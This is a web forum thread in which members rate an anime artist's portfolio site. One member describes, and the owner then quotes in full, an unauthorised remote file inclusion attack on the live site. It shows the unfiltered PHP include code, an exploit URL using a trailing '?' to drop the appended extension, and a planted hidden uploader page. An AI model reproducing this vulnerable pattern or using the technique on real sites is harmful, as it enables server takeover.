My site!

[HyDr@]

http://www.hydra-art.net/

its kind of my portfolio, it also offers anime wallpapers.

Some comment and support would be appreciated.

[Spartan Erik]

I'm not a fan of anime but I can tell you're quite talented; I love your website design, it has a nice color scheme to it

9/10, only because I'm not a fan of anime; otherwise, a 10/10

[Articz]

i also like your layout i wish i could design layouts like that for my sites i like the colours used as it the images stand out much more.
10/10 here

and i not a anime fan either

[mikel2k3]

I like it :D
10/10... I need to start making better designs

well done

[The_Magistrate]

The design is pretty sweet. Interesting color scheme. Although, you have some black on dark grey headings in the menu on the right. Kinda hard to read. Your wallpapers are fantastic. Biggest drawback is that you used tables for layout, which is a big pet-peeve of mine. 7/10

[Bryon]

Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have. ;)

On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.

I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])

In your script you are including files in a way similar to:

PHP Code:

..
$filename = $_GET['p'];
include($filename .'.php');
.. 


You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )

If you include a file into a PHP script, and that file contains PHP tags, ("<?[php] and ?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:

http://nedren.com/help/poc_write.txt?

And include in into your script:

http://www.hydra-art.net/index.php?p...poc_write.txt?

Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename?

The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:

http://www.hydra-art.net/PoC_NedreN.hidden.php

As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.

The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You never can trust that data supplied by a visitor is "clean" and not harmful in any way at all.

So yeah, I showed you how I did this, so now I'll show you how to fix it.

Please read this, which will help you secure your script fully:

http://forums.x10hosting.com/showthread.php?t=12620

If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.

Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.

Adios,
-Bryon

[HyDr@]

Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have. ;)

On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.

I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])

In your script you are including files in a way similar to:

PHP Code:

..
$filename = $_GET['p'];
include($filename .'.php');
.. 


You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )

If you include a file into a PHP script, and that file contains PHP tags, ("<?[php] and ?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:

http://nedren.com/help/poc_write.txt?

And include in into your script:

http://www.hydra-art.net/index.php?p...poc_write.txt?

Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename?

The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:

http://www.hydra-art.net/PoC_NedreN.hidden.php

As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.

The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You never can trust that data supplied by a visitor is "clean" and not harmful in any way at all.

So yeah, I showed you how I did this, so now I'll show you how to fix it.

Please read this, which will help you secure your script fully:

http://forums.x10hosting.com/showthread.php?t=12620

If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.

Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.

Adios,
-Bryon

no, its fine , i actually know theres some big security problem there, i just didnt really have the time earlier (exams) to try and fix it.

[oab]

site suspended, awwww, i really wanted to see it...

[noerrorsfound]

site suspended, awwww, i really wanted to see it...

It doesn't look suspended to me.

[oab]

wow your very talented, i suk at art and crap like that.